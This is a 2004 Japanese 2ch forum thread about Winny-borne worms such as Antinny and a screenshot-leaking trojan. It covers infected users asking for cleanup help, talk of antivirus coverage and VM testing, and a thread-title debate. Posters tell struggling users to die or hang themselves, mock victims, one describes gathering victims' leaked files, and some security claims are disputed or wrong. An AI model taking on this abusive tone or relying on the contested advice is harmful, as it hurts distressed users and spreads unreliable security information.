それとそのzipをダブルクリックして中身を観覧した場合も感染しますかぁ?

369 :[名無し]さん(bin+cue).rar:04/11/07 18:15:43 ID:QF4xbizt
>>368
しません
そんなこともわからないならWinnyすな!

370 :[名無し]さん(bin+cue).rar:04/11/07 18:16:39 ID:+RLSwJQg
すまん。俺が悪かった。
ここは質問スレじゃないし…。

そんな初歩的な質問は然るべきところでしろ


371 :[名無し]さん(bin+cue).rar:04/11/07 18:17:13 ID:VKzsKV61
>>366
代理レスありがとう
雑談であそこまで真剣になるなんてあやしいね

372 :[名無し]さん(bin+cue).rar:04/11/07 18:21:16 ID:vHQIITP6
厨密度高すぎ・・・

373 :[名無し]さん(bin+cue).rar:04/11/07 18:22:22 ID:UsO2O2EZ
センスあるやつならいいんじゃないかな。
一般人を巻き込まないですむやつ。

374 :[名無し]さん(bin+cue).rar:04/11/07 18:23:34 ID:glk8NoR4
>>369
まじですまんかった_no
でも、どっかでアーカイブのセキュリティーホールをついたウィルスが、どうのこうのって聞いたので不安だった
ちゃんとwindowsアップデートしてれば問題なしなのかな

375 :[名無し]さん(bin+cue).rar:04/11/07 18:24:37 ID:vDNlG/mN
>>374
>>369は馬鹿だから、信じるな。キミの知識が正しい。

376 :[名無し]さん(bin+cue).rar:04/11/07 18:24:55 ID:yDNU0KE/
しかし、いまだに対応できていないウイルス対策ソフト様各位はいったい何を・・・・・

故意に対策しないのか?


377 :[名無し]さん(bin+cue).rar:04/11/07 18:26:18 ID:THjT0VmL
>>376
幼稚な陰謀論はこうして生まれる、というサンプル

378 :[名無し]さん(bin+cue).rar:04/11/07 18:26:20 ID:QF4xbizt
>>375
Winrar使ってない限りZipウィルスにはかかりません
古典zipウィルスは下火だしな


379 :[名無し]さん(bin+cue).rar:04/11/07 18:28:43 ID:VKzsKV61
Ny起動してなきゃ派手な被害はないから放置でもNP

380 :[名無し]さん(bin+cue).rar:04/11/07 18:28:51 ID:W+BTtH86
書庫圧縮するウイルス出た時に
個人情報が詰まってる可能性が高い各種メーラー一式を装った
ウイルスが出ると思って注意してたんだが結構出ないものだね。
好奇心で注意をそらすって感じでさ('A`)

381 :[名無し]さん(bin+cue).rar:04/11/07 18:31:06 ID:vDNlG/mN
>>378
残念ながら、それも間違い。

382 :[名無し]さん(bin+cue).rar:04/11/07 18:31:26 ID:THjT0VmL
>>380
そんなことするより、出たばかりの新しい漫画単行本とかゲームソフト
とかの名前で出す方がはるかにダウンロードされる、という現実を
皆知っているから。

383 :[名無し]さん(bin+cue).rar:04/11/07 18:32:34 ID:THjT0VmL
ZIP用DLLにセキュリティホールがあった。
いまは修正されてる。

最新版にしときましょう。
http://www2.nsknet.or.jp/~micco/micindex.html

384 :[名無し]さん(bin+cue).rar:04/11/07 18:34:29 ID:W+BTtH86
>>382
そういえばそうですな、確かに比じゃなさそう。

385 :[名無し]さん(bin+cue).rar:04/11/07 18:35:15 ID:glk8NoR4
>>383
thanks
ぐぐってきます

386 :[名無し]さん(bin+cue).rar:04/11/07 18:35:16 ID:t97WMKYb
>>356
虫歯の根絶なんて簡単だよ、歯を全部抜けばいい。
トロイ根絶にny撤廃ってのと、同じことだな。

昨夜から[私はポート0設定…]と[私には好きな…]が増加傾向にあるなぁ
本体はどこに転がってるんだろぅ? 単に、俺はブツを見たい、解析したい
だけなんだが。それっぽいの踏んだ人は報告ヨロ

387 :[名無し]さん(bin+cue).rar:04/11/07 18:37:27 ID:kCkEumCT
>>368
死ね

388 :[名無し]さん(bin+cue).rar:04/11/07 18:41:28 ID:hGfEkjOR
>>371
それくらい調べろよぉ。オマエん家のググルはナニやっとんじゃー!
ttp://www.forest.impress.co.jp/article/2004/07/30/arcsecurity.html

礼は「解凍レンジ」のサクーシャにコイツの対応要望メル出すだけでカンベソしたらぁw

389 :[名無し]さん(bin+cue).rar:04/11/07 18:44:37 ID:VKzsKV61
>>388
ミスとは思いつつごめんなさい

390 :[名無し]さん(bin+cue).rar:04/11/07 18:46:41 ID:r0bnTgIf
>>386
解析してみた。
亜種は亜種だなというのが正直な感想。

391 :[名無し]さん(bin+cue).rar:04/11/07 18:46:49 ID:tRHKOnMZ
ラグナロクやってるやつおおすぎ

392 :[名無し]さん(bin+cue).rar:04/11/07 18:49:11 ID:GnXXCA59
NortonとかVirusBusterのsetup.exeに偽装したウイルスでも
対策してくれるんだろうか。

自社ソフトのwarezを使おうとして感染した奴は心情的には放っておきたいだろうが
そうすると評判が落ちるのかな。

393 :[名無し]さん(bin+cue).rar:04/11/07 18:53:31 ID:THjT0VmL
>>392
しない理由は何もない。

394 :[名無し]さん(bin+cue).rar:04/11/07 19:03:03 ID:QF4xbizt
馬鹿はノートンぐらい買えよ
WIndowsマスターならアンチウィルスソフトなんかいらんがな

395 :[名無し]さん(bin+cue).rar:04/11/07 19:10:56 ID:FARYOA8F
>>392
しなかった場合、対策した他社からあそこのソフトは対応できていないと
攻撃される材料になるだけ。

396 :[名無し]さん(bin+cue).rar:04/11/07 19:15:17 ID:wpYxwSDZ
>>394
それも間違い。

397 :[名無し]さん(bin+cue).rar:04/11/07 19:15:17 ID:1Bx1IOtk
した場合、割ってもいいですよというお墨付きがもらえるわけだな

398 :[名無し]さん(bin+cue).rar:04/11/07 19:18:28 ID:noT1I046
>>397
ウイルスに対処するのと、割れに対処するのは別問題。

399 :[名無し]さん(bin+cue).rar:04/11/07 19:18:49 ID:9ItVDbCZ
Antinny.AとKにひっかかったみたいだけど
これはどんな影響でるの?

400 :[名無し]さん(bin+cue).rar:04/11/07 19:20:30 ID:HTbc3aTD
>>399
ググれヴヴォケ

401 :[名無し]さん(bin+cue).rar:04/11/07 19:21:02 ID:hC44dJlC
>>399,>>1
>質問はテンプレを読んでからにして下さい。
>読まずに質問しても「テンプレ嫁」と切り返されるだけです。

402 :[名無し]さん(bin+cue).rar:04/11/07 19:25:09 ID:vHQIITP6
酷いスレになったな・・

403 :( ´,_ゝ`):04/11/07 19:27:36 ID:QF4xbizt
抽出ID:vHQIITP6 (4回)

345 名前:[名無し]さん(bin+cue).rar[sage] 投稿日:04/11/07(日) 16:38:48 ID:vHQIITP6
香ばしいのが多くなったね・・・

349 名前:[名無し]さん(bin+cue).rar[sage] 投稿日:04/11/07(日) 16:58:38 ID:vHQIITP6
・・・・・・

372 名前:[名無し]さん(bin+cue).rar[sage] 投稿日:04/11/07(日) 18:21:16 ID:vHQIITP6
厨密度高すぎ・・・

402 名前:[名無し]さん(bin+cue).rar[sage] 投稿日:04/11/07(日) 19:25:09 ID:vHQIITP6
酷いスレになったな・・


ID:vHQIITP6が一番内容のないレスしてるしwwwwwwww

404 :[名無し]さん(bin+cue).rar:04/11/07 19:29:15 ID:wpYxwSDZ
>>403
それも間違い

405 :[名無し]さん(bin+cue).rar:04/11/07 19:32:29 ID:kJfm/m6m
ノートン先生、2005から要あくちべーしょん
まいなーワームにも対応するよ、でも違法コピーじゃ定義ファイルを
更新させないからちゃんと金出してね。と先生はおっしゃっておられるw

406 :[名無し]さん(bin+cue).rar:04/11/07 19:36:26 ID:BzpG2xq4
ageが多いね。

407 :[名無し]さん(bin+cue).rar:04/11/07 19:46:05 ID:s7LI0suK
ここって、最新版ウイルススキャンで未対応のニュイルススレだと思ってた
違ったのね?

408 :[名無し]さん(bin+cue).rar:04/11/07 19:51:36 ID:e6oasC3d
ニュイルス(・∀・)イイ!

>>394
上級者ほど対策は疎かにしないものだし自分の能力にも過信しない
連中はユーザの脆弱性を糧にして成長したんだからな

とりあえず知ったか厨は5年ばかしROMってろやヴォケ

409 :[名無し]さん(bin+cue).rar:04/11/07 19:53:39 ID:asUHOpt4
「自称中級者が一番危ない」ってよく言うしな

そんな俺は自称中級者

410 :[名無し]さん(bin+cue).rar:04/11/07 19:58:29 ID:JQzaHcaF
ニュイルス検証がオモロイかもしれんが
ときたま質問スレに。

411 :[名無し]さん(bin+cue).rar:04/11/07 20:00:16 ID:5fPTocBA
結局この亜種らしきものは解明してないのか?
 >>104 


412 :[名無し]さん(bin+cue).rar:04/11/07 20:06:22 ID:q/v++7D/
結局、仙台が梱包されたてたエロゲーってどのソフト?

413 :[名無し]さん(bin+cue).rar:04/11/07 20:08:45 ID:QF4xbizt
メイドさんしぃしぃ

414 :[名無し]さん(bin+cue).rar:04/11/07 20:17:19 ID:qX+82N/m
>>367
351ではないけど参考になりました。
ありがとうございました。


415 :[名無し]さん(bin+cue).rar:04/11/07 20:19:01 ID:BzpG2xq4
不安なら仮想OS使えばいいじゃん。

416 :[名無し]さん(bin+cue).rar:04/11/07 20:35:40 ID:41UgeLwa
仮想でもSSは流れるじゃん

417 :[名無し]さん(bin+cue).rar:04/11/07 20:39:47 ID:tXsmv3FD
個人情報をカケラも入れてない専用マシンで運用するのが大吉。

418 :[名無し]さん(bin+cue).rar:04/11/07 20:43:53 ID:LstXuuIV
>>412
こんねこ
グリーングリーン2
と聞いているが。

419 :[名無し]さん(bin+cue).rar:04/11/07 20:48:38 ID:9FRTRoyC
そういえば少し前、
「グリーングリーン2もう流れてるよ〜」
と何もないのに書き込んでる香具師がいたが、
そいつが今回のやつを作ったのかもしれん。

420 :[名無し]さん(bin+cue).rar:04/11/07 20:49:25 ID:QUsDfVCK
CDのオートラン解除しなくても
もうウィルス定義更新されたから
オートランでexe実行する前に未然に防いでくれるよね?

421 :[名無し]さん(bin+cue).rar:04/11/07 20:50:36 ID:BzpG2xq4
>>416
ウィルスだったら消せばいいじゃん。

422 :[名無し]さん(bin+cue).rar:04/11/07 21:02:06 ID:THjT0VmL
オートランは常時OFFにして、
必用な時だけこのテのソフトで任意に実行させるのが無難。

AutoRun Executer
http://www.vector.co.jp/soft/win95/util/se061704.html


423 :[名無し]さん(bin+cue).rar:04/11/07 21:16:47 ID:1Bx1IOtk
>>420
亜種踏むぞ。エロゲ落とすのなんてやめとけ。

424 :[名無し]さん(bin+cue).rar:04/11/07 21:20:25 ID:riUBtazw
エロゲは実験機で確認してくれる神が居るから逆に安心して落とせるんだけどな。
それを知らないアフォが引っかかってるだけだろ。

425 :[名無し]さん(bin+cue).rar:04/11/07 21:21:51 ID:9kEh0A8N
>>413
ワロタw

426 :[名無し]さん(bin+cue).rar:04/11/07 21:35:06 ID:t97WMKYb
>>411
まだ判明してない。感染者は徐々に増加中。かなり深刻だと思うよ。これ。
地引してるんだが、あまりに酷い(人生終わりそうなのばっかり)ので、ちょっと躊躇してるぐらい。

特に、クラスタワードで、ショタ関係とか、交換用とかにしてる香具師。危なすぎ(w

現在は[私はポート…]と[私には好きな…]で晒されてるファイルと、
仙台キンタマで流されてるSSとで、ユーザー名あたりで関連性を調べてる

427 :[名無し]さん(bin+cue).rar:04/11/07 21:37:31 ID:1Bx1IOtk
買ってきてベリファイするならともかく、稼動実験だけだと遅効性トロイに直撃しそうだ。

428 :[名無し]さん(bin+cue).rar:04/11/07 21:39:29 ID:HTbc3aTD
>>621
winnのフォルダ以外のトコにUPフォルダを作ってるのかもしれない
フォルダ情報からパスもわからないんならとりあえず検索してみる

一応、こっちにもいってみる
【警報】Winnyを狙ったワーム・ウイルス情報 Part30
http://tmp4.2ch.net/test/read.cgi/download/1099709559/


429 :428:04/11/07 21:39:56 ID:HTbc3aTD
誤爆です

430 :[名無し]さん(bin+cue).rar:04/11/07 21:41:26 ID:vHQIITP6
スレが正常化しつつあるね

431 :[名無し]さん(bin+cue).rar:04/11/07 21:41:38 ID:E/SJ2qOc
(・∀・)ニヤニヤ

432 :[名無し]さん(bin+cue).rar:04/11/07 21:41:50 ID:7SCgPncj
>>428
了解しました。

433 :[名無し]さん(bin+cue).rar:04/11/07 21:47:54 ID:4/rFCv15
亜種踏んでもーた orz

win.iniいじられてる椰子は直ぐに
回線を切って首を鶴がよかろう。ホホホ

434 :209=275:04/11/07 21:50:39 ID:kCpZhge0
昨日から世話になってる者なんですが、
やっぱりずっと稼動してる必要あるんで再インスコは不可っぽいのです。
申し訳無いんだが
>>254で聞いたファイル名を指定して実行で打ち込むやつを晒してくれないか。
svchost32.exe を消したいんですが。

デスクトップ画面が定期的に写真取られてるのがどうも気持ち悪い。

>>276
Nyはコレに懲りてしばらく止めます。
その代わり半年ROMって厨房脱出しよう orz


435 :[名無し]さん(bin+cue).rar:04/11/07 21:54:48 ID:l0rqSPHB
自業自得だよ
モラルに反する事したからだ
だから諦めな

436 :[名無し]さん(bin+cue).rar:04/11/07 21:58:18 ID:wRA8CMmq
nyやるんだったら少々(?)のリスクは覚悟しないと。


437 :[名無し]さん(bin+cue).rar:04/11/07 22:00:04 ID:BzpG2xq4
>>276がいいこと書いてるぞ。

438 :[名無し]さん(bin+cue).rar:04/11/07 22:05:04 ID:6L8B7cBR
>>434
メモ帳で上書きしてしまうっていう方法とか
ttp://homepage3.nifty.com/t-sugiyama/

Reboot File Deleter Ver.1.13
ていうのを使ってみなよ。

439 :209=275:04/11/07 22:17:50 ID:kCpZhge0
del "C:\windows\system32\svchost32.exe"
と打ち込むと
'del'が見つかりません。
名前を正しく入力したかどうかを〜
と出て何もできないのですが。
やや、上のテンプレサイトは読みましたよ。

>>438
ありがとうございます。
しかしパソコン管理〜じゃないのでログインできませんでしたorz

440 :[名無し]さん(bin+cue).rar:04/11/07 22:18:43 ID:l0rqSPHB
>>439
>>276

441 :209=275:04/11/07 22:25:09 ID:kCpZhge0
アンチウイルスってのが出るまで待って、
nyは放置しておけば無問題なんでしょうか。
なんか気になるんで時間毎にupフォルダに加わる
デスクトップの写真は消してるんですが。

442 :[名無し]さん(bin+cue).rar:04/11/07 22:26:01 ID:92J47YjQ
ウイルスに関して質問があります。
急に画面が血で真っ赤になって、「ぬるぽ」という文字が出てきました。
これはなんという名前のウイルスなんでしょうか??
「きんたま」ではないと思うのですが…


443 :[名無し]さん(bin+cue).rar:04/11/07 22:26:37 ID:l46fp57P
Antinnyに感染してupフォルダとup.txtができてました。
駆除しようとしてウイルスバスター2005の体験版や
トレンドマイクロのオンラインスキャンを使ったんですが
発見できませんでした。
何ででしょうか?
レジストリエディタを
ファイル名から検索をしたらメモ帳が起動します。

444 :[名無し]さん(bin+cue).rar:04/11/07 22:26:55 ID:S8sHNyIN
>>439は釣りか?とりあえず下げろ

445 :[名無し]さん(bin+cue).rar:04/11/07 22:28:45 ID:8mJIDmWN
>>443
まだパターンファイルが対応してないから。

446 :[名無し]さん(bin+cue).rar:04/11/07 22:29:18 ID:tXsmv3FD
>>439
ウイルスにかかったのを根治せずに対処療法だけで使い続ける
のはどうかと思うな。ずっと稼働している必要があるマシンな
ら、なおさらだ。

致命的な行動を起こすタイマーが、いまもカウントダウンし続
けている可能性もあるんだし、管理者なりにきちんと報告して
初期化するのがいちばん安全。

事情をあまり知られたくないから、自力でどうにかしようとい
うのはわからんでもないけど、次のゾロ目は今週の木曜日だ。
その時になって大騒ぎになるくらいなら、明日の朝一番に頭下
げて対処してもらったほうがいい。

447 :[名無し]さん(bin+cue).rar:04/11/07 22:31:53 ID:hC44dJlC
>>442,>>1
>質問はテンプレを読んでからにして下さい。
>読まずに質問しても「テンプレ嫁」と切り返されるだけです。

なんでまたこんな質問ばかりなのか、少しは自分で調べようや

448 :443:04/11/07 22:32:47 ID:l46fp57P
>>445
どうしたらいいでしょうか?

449 :[名無し]さん(bin+cue).rar:04/11/07 22:34:55 ID:E/SJ2qOc
(・∀・)ニヤニヤ

450 :[名無し]さん(bin+cue).rar:04/11/07 22:35:25 ID:BzpG2xq4
>>443,>>1
>質問はテンプレを読んでからにして下さい。
>読まずに質問しても「テンプレ嫁」と切り返されるだけです。

なんでまたこんな質問ばかりなのか、少しは自分で調べようや


451 :[名無し]さん(bin+cue).rar:04/11/07 22:35:48 ID:4Xv+ix2T
スクリーンセーバー実行しました。
バスター反応。削除
タスクマネージャーが起動できなくなる。レジストリで直しました。



452 :[名無し]さん(bin+cue).rar:04/11/07 22:35:49 ID:riUBtazw
なんでこう次々とアホが引っかかるの?

453 :[名無し]さん(bin+cue).rar:04/11/07 22:36:47 ID:TvIlhLEl
>>439
ざっと見ただけでよくわからんが、svchost32.exeを消せばいいってことだよね?

セーフモードで起動して消せばいいんじゃないの?

454 :[名無し]さん(bin+cue).rar:04/11/07 22:37:08 ID:0tiHxnKP
アホだから

455 :[名無し]さん(bin+cue).rar:04/11/07 22:37:30 ID:e6oasC3d
>>439
いい加減スレ違いだから余所へ逝け
ここはWindowsの初心者質問スレじゃねぇぞ


>>442-443
既出ウィルスの対策お助けスレでもねぇぞ
テンプレ読んで自分で対処汁
できないのなら回線切って首を吊れ

456 :[名無し]さん(bin+cue).rar:04/11/07 22:38:32 ID:wpYxwSDZ
ヒャッヒャッヒャ ヽ(゚∀゚)メ(゚∀゚)メ( ゚∀゚)人(゚∀゚ )メ(゚∀゚)メ(゚∀゚)ノ ッヒャッヒャッヒャ

457 :[名無し]さん(bin+cue).rar:04/11/07 22:39:03 ID:Wh03xESj
>>442-443
わるいことはいわん再インスコしとけ。

458 :[名無し]さん(bin+cue).rar:04/11/07 22:39:20 ID:S8sHNyIN
>>451
上げるなボケ厨房がよってくるだろ!
ってお前か厨房は

各社の対応状況はどうなってんだ?
とりあえず前スレあたりのは対応ってこといいのか?
あと特攻したやつは状況お願いします、、

459 :[名無し]さん(bin+cue).rar:04/11/07 22:39:46 ID:8mJIDmWN
>>448
OS再インストール。

460 :[名無し]さん(bin+cue).rar:04/11/07 22:41:47 ID:BzpG2xq4
ここは新種ウィルスの情報交換と
ウィルス駆除できないくて焦るアホを眺めて(・∀・)ニヤニヤするスレだから、
アホが書き込んでも(・∀・)ニヤニヤされるだけだぞ。
基本的に。



461 :[名無し]さん(bin+cue).rar:04/11/07 22:43:50 ID:S8sHNyIN
>>460のが言うように
以後、厨房質問は無視の方向でいきましょう皆様

462 :443:04/11/07 22:44:34 ID:l46fp57P
>>Winnyをフォルダごと削除
と書かれてますがDOWNフォルダもなんですか?


463 :[名無し]さん(bin+cue).rar:04/11/07 22:45:39 ID:e6oasC3d
アホはアホでも自助努力の形跡が認められれば、
(・∀・)ニヤニヤしながら教えてやらんこともない

気分が(・∀・)イイ!時限定でな

464 :[名無し]さん(bin+cue).rar:04/11/07 22:49:13 ID:BzpG2xq4
あとキャラが面白かったら教えてあげる人が多いな。
都合が悪い書き込みをすべてキャンセルする462みたいなのは
面白くないばかりかうざくてしつこいから一番教えたくない。

465 :[名無し]さん(bin+cue).rar:04/11/07 22:49:49 ID:DikzqUwE
なんかさ、そろそろ
ユーザー1ウイルス感染

ユーザー1のスクリーンショット自動UP

2chで晒されて一般ピーポーアクセス

jpgにウイルスが自動に組み込まれるようになってて見た人も感染

ユーザー2・3・4.....

ってのも出てきそうだな
Winnyなんぞやめとけ

466 :443:04/11/07 22:50:07 ID:l46fp57P
>>463
もう2度と使いません。
ただ今までに落としたファイルだけは残しておきたいんです。


467 :[名無し]さん(bin+cue).rar:04/11/07 22:50:27 ID:S8sHNyIN
元祖仙台GAはAV大手ほぼ対応ってことであとは
「ポート0」とか「私」なんだがこいつらは中身別物なのか?
俺いまだに落ちてこないから確認できなんだが....
他にニュイルス情報は無いよな?

468 :[名無し]さん(bin+cue).rar:04/11/07 22:50:28 ID:glk8NoR4
上の方で仮想OS使えばいいじゃんって案が出てるけど
実際つかった香具師入るのかな
使ってみれば分かるけど、動作が遅くてまだ実用レベルじゃないぞ
ホストOSからゲストOSにファイル転送するだけで何時間かかることやら

469 :[名無し]さん(bin+cue).rar:04/11/07 22:53:31 ID:S8sHNyIN
>>468
VMとか俺のマシンじゃくそ重いから
前スレで特攻したときは、余剰パーツ急造して実験したぞ
正直仮想OSはしんどいと思う。
特攻するなら安全領域必要だな...

470 :463:04/11/07 22:53:45 ID:e6oasC3d
>>466
何で俺を名指しすんだ? 指名料高いぞw

つか、おまいは>>463の一行目に該当しないから教えてやらん

471 :[名無し]さん(bin+cue).rar:04/11/07 22:53:54 ID:CeVfn+kw
え?IDE7200回転だけどCD一枚3分でコピーできるし
ゲストOS用のCDのソースをバーチャルCDにすれば
コピーする必要さえないんだが?

472 :[名無し]さん(bin+cue).rar:04/11/07 22:55:09 ID:BzpG2xq4
>>468
多分言ったの俺だけど実際使ってない。
アプリ落とさないから必要ないんだよね。
でもウィルス駆除してる時間に比べれば楽なもんじゃない?
転送終わるまで放置しときゃいいんだし。

473 :[名無し]さん(bin+cue).rar:04/11/07 22:56:46 ID:IxML2QFu
スレタイが微妙だから、お助けスレだと思って
やってくる香具師は後を絶たない罠

474 :[名無し]さん(bin+cue).rar:04/11/07 22:57:23 ID:BzpG2xq4
じゃあスレタイかえる?

475 :[名無し]さん(bin+cue).rar:04/11/07 22:57:42 ID:TvIlhLEl
>>468
マシンスペックは並だが、ファイルのコピー以前の問題でもたつくのが嫌。
音楽再生すらダメ。

エロゲとかアプリの動確以外に使い道は無い。

476 :[名無し]さん(bin+cue).rar:04/11/07 22:57:56 ID:tXsmv3FD
VMはファイルの動作確認に使うだけで、それでP2Pもしろって
意味ではないでそ。仮想側で発動しても、Undosableすればい
いだけだし。

477 :[名無し]さん(bin+cue).rar:04/11/07 22:58:59 ID:S8sHNyIN
次からスレタイ変えますかー
ダメポ、俺の頭じゃ良いスレタイ思いつかない

478 :[名無し]さん(bin+cue).rar:04/11/07 23:00:52 ID:hC44dJlC
>>466
ただ言える事は、ny使ってた記憶も落としたファイルもウィルスごと全部消去してしまった方が良い

479 :[名無し]さん(bin+cue).rar:04/11/07 23:02:12 ID:S8sHNyIN
>>476
orz
俺winny動かして感染状況調べてたよ
所詮ザコでした(;´д`)

しかしまだ落ちてこないのだが「仙台好き」どうなってんだ?

480 :[名無し]さん(bin+cue).rar:04/11/07 23:02:31 ID:BzpG2xq4
スレタイ思いつかね。

481 :[名無し]さん(bin+cue).rar:04/11/07 23:03:00 ID:e6oasC3d
現行スレタイ形式のケツに【既出質問厳禁】でも付けときゃ良いんじゃね?

482 :[名無し]さん(bin+cue).rar:04/11/07 23:03:29 ID:riUBtazw
一度ny使った奴が抜け出せるはずがない。

483 :[名無し]さん(bin+cue).rar:04/11/07 23:03:37 ID:t1mBqp/S
【警報】を外すだけでも少しは変わると思うんだが、どうよ?

484 :[名無し]さん(bin+cue).rar:04/11/07 23:04:32 ID:BzpG2xq4
できればスレタイからウィルスという文字をなくしたいなぁ。
検索厨も減ると思うし。

485 :[名無し]さん(bin+cue).rar:04/11/07 23:04:59 ID:5AVmqzNh
こんにちは私は最近インターネットエクスプロラをやりはじめました彩子と申します
色々あるですねけいじいた?
びっくりしちゃいました^^
ここなら初心者のわたしでも色々みなさが教えてくれそうですね^^
これからよろしくおねがいします!!!!!!!!!!!!!!
はやくみなさんと仲良くなれるようにgんばるす


486 :[名無し]さん(bin+cue).rar:04/11/07 23:05:33 ID:BzpG2xq4
まぁ無理か。


487 :[名無し]さん(bin+cue).rar:04/11/07 23:05:38 ID:S8sHNyIN
確かに警報外すのはいい手だと思う
【特攻】○○【求む】とかどうよ?(笑)

488 :[名無し]さん(bin+cue).rar:04/11/07 23:06:36 ID:riUBtazw
スレタイエロゲスレみたいにしたらどうよ?

489 :[名無し]さん(bin+cue).rar:04/11/07 23:07:33 ID:hC44dJlC
別にスレタイそのままで良いのでは?
新種やらアフォが出ない限りそれ程賑わう訳でもないし、
ただ初心者お断り・テンプレ嫁はもっとアピールすべきだとは思うが

密かにshareウィルススレと統合したかったんだが、もうこの様子だと無理だろうなぁ

490 :[名無し]さん(bin+cue).rar:04/11/07 23:07:44 ID:l46fp57P
>>470
調べても出ないんです。
Shell32
というのがでて本文は
Runtime error とでています。



491 :[名無し]さん(bin+cue).rar:04/11/07 23:07:59 ID:8mJIDmWN
>>482
全部無料だもんな〜
麻薬みたいなもんなんだろうな。

492 :[名無し]さん(bin+cue).rar:04/11/07 23:09:05 ID:jpEGPtU9
Winnyワーム・ウイルス構造解析Part31

こんなのどうだ?

493 :[名無し]さん(bin+cue).rar:04/11/07 23:09:18 ID:S8sHNyIN
shareと統合はコッチを敵視してるやつがいるから無理だと思うぞ


494 :[名無し]さん(bin+cue).rar:04/11/07 23:09:50 ID:BzpG2xq4
>>492
イイ!と思う。

495 :[名無し]さん(bin+cue).rar:04/11/07 23:10:22 ID:QUsDfVCK
Linux上でWinをエミュレートしてる場合でも感染するのか?

496 :609:04/11/07 23:11:12 ID:kCpZhge0
。・゜・(ノД`)・゜・。
svchost32.exe消すのだけ助けて下さい。
ファイル名を指定して〜のコマンド教えてくれるだけで良いんで。
セーフモードはいくらF8押してもなりませんでした。WinXPです。

497 :609:04/11/07 23:11:47 ID:kCpZhge0
age1てすんません。

498 :[名無し]さん(bin+cue).rar:04/11/07 23:12:23 ID:hC44dJlC
>>463頑張れw、なんか知らんがID:l46fp57Pは高い指名料払う気満々らしい

499 :[名無し]さん(bin+cue).rar:04/11/07 23:12:28 ID:S8sHNyIN
>>492
それで行ってみようよ
で、>>487つけて決定で(冗談です)

500 :[名無し]さん(bin+cue).rar:04/11/07 23:12:29 ID:8mJIDmWN
>>492
(・∀・)イイ!!と思う。

501 :463:04/11/07 23:12:47 ID:e6oasC3d
>>490
だから何で俺なんだYO
>>470以外で直レスしてねぇだろが

>>1-10音読して勝手に対処汁

502 :[名無し]さん(bin+cue).rar:04/11/07 23:13:02 ID:6YnlMqdq
ウイルスをニュイルスにしておけば検索に引っかからないだろ(w

503 :[名無し]さん(bin+cue).rar:04/11/07 23:13:19 ID:VKzsKV61
バックアップとってクリーンインストールした方が何かと安心

504 :[名無し]さん(bin+cue).rar:04/11/07 23:14:29 ID:Sg1nqW00
もうぬるぽーす

505 :[名無し]さん(bin+cue).rar:04/11/07 23:15:07 ID:riUBtazw
(・∀・)ゥィルスー!!スレpart31とかの方がいいんでねーの?
普通の検索のしかたじゃ引っかからないように。
たまたま「ウイルス」で変換したら「(・∀・)ゥィルスー!!」になったから思いついただけだけど。

506 :[名無し]さん(bin+cue).rar:04/11/07 23:15:44 ID:BzpG2xq4
ニュイルス捨てがたいな。

507 :[名無し]さん(bin+cue).rar:04/11/07 23:16:08 ID:S8sHNyIN
ニュイルスに1表!

508 :[名無し]さん(bin+cue).rar:04/11/07 23:17:36 ID:BzpG2xq4
【特攻】Winnyを狙ったワーム・ニュイルス構造解析Part31【求む】

全部混ぜてみたw

509 :[名無し]さん(bin+cue).rar:04/11/07 23:17:37 ID:VKzsKV61
名前は「AntinySendaiGalaxyAngel」で

510 :[名無し]さん(bin+cue).rar:04/11/07 23:18:15 ID:VKzsKV61
最後にsつけるの忘れた

511 :[名無し]さん(bin+cue).rar:04/11/07 23:18:28 ID:tXsmv3FD
>>508
ワームもニャームにしてくれ(w。

512 :[名無し]さん(bin+cue).rar:04/11/07 23:18:40 ID:riUBtazw
ニュイルスいいね。
ワームも変えたいところだ。
狙ったも変えたいな。

513 :[名無し]さん(bin+cue).rar:04/11/07 23:19:10 ID:Sg1nqW00
Winnyのばい菌情報Part31

514 :[名無し]さん(bin+cue).rar:04/11/07 23:19:24 ID:BzpG2xq4
【特攻】Winnyを狙ったニャーム・ニュイルス構造解析Part31【求む】

何のスレだw


515 :[名無し]さん(bin+cue).rar:04/11/07 23:19:37 ID:riUBtazw
>>513
ビビビと来ました。

516 :[名無し]さん(bin+cue).rar:04/11/07 23:21:15 ID:IxML2QFu
ニャーム・ニュイルス・・・
もう誰もちか

517 :[名無し]さん(bin+cue).rar:04/11/07 23:21:19 ID:BzpG2xq4
じゃあ
WinnyのニュイルスPart31

なんてのは?

518 :[名無し]さん(bin+cue).rar:04/11/07 23:22:22 ID:TvIlhLEl
>>496
システムの復元で感染前まで戻せ。あとはWinnyフォルダで
改変されたファイルを、手動で修復すれば元通り。
これが一番手っ取り速いぞ。

svchost32.exeだけ消したいならばsystem32フォルダを開いて
svchost32.exeの名前を変えろ。
あとはタスクマネージャで2つあるsvchost32.exeのプロセスを終了
すれば普通に消せるはずだ。

ただし、svchost32.exeを消すだけでは根本的な解決にはならんぞ。
デスクトップSSのアップロードは止まるが、レジストリエディタの上書き
が治まらない場合がある。

519 :[名無し]さん(bin+cue).rar:04/11/07 23:22:48 ID:tXsmv3FD
>>514
「にゃ」と「にゅ」が来たなら、「にょ」も欲しいところだな。

【特攻】Winnyを狙ったニャーム・ニュイルス構造解析Part31【求むにょ】

520 :[名無し]さん(bin+cue).rar:04/11/07 23:23:13 ID:Sg1nqW00
感染者を嘲笑するスレ31

521 :[名無し]さん(bin+cue).rar:04/11/07 23:24:07 ID:8mJIDmWN
winnyといれたら検索に引っかかって
結局現状と変わらないような希ガス

522 :[名無し]さん(bin+cue).rar:04/11/07 23:24:19 ID:BzpG2xq4
>>520
それ感染者が来ないからw

523 :[名無し]さん(bin+cue).rar:04/11/07 23:24:54 ID:wQwmiXH/
winnyを入れずににょを入れるならこの際こんな感じに。

【特攻】ニィを狙ったニャーム・ニュイルス構造解析Part31【もにょむ】

524 :[名無し]さん(bin+cue).rar:04/11/07 23:25:39 ID:l0rqSPHB
とりあえず>>209>>443は通報しといた

525 :[名無し]さん(bin+cue).rar:04/11/07 23:26:07 ID:e6oasC3d
「にょ」はやめとけ
かえって変なのが寄って来そうだ

526 :[名無し]さん(bin+cue).rar:04/11/07 23:26:29 ID:UVTPQy9a
>>523
住人でさえ寄り付かなくなるな・・・w

527 :[名無し]さん(bin+cue).rar:04/11/07 23:26:34 ID:7eoKHFKF
それ以外は良いのかよ

528 :[名無し]さん(bin+cue).rar:04/11/07 23:26:58 ID:AMbcxY3J
>>421
流れたSSは消せないじゃん

529 :[名無し]さん(bin+cue).rar:04/11/07 23:27:03 ID:t97WMKYb
次スレ案>>492に禿同

で、ちょいと新亜種(というか時限発動?)らしきものもあるので経時報告

・元祖仙台キンタマ→先生対応済み
   症状その他は>>38参照

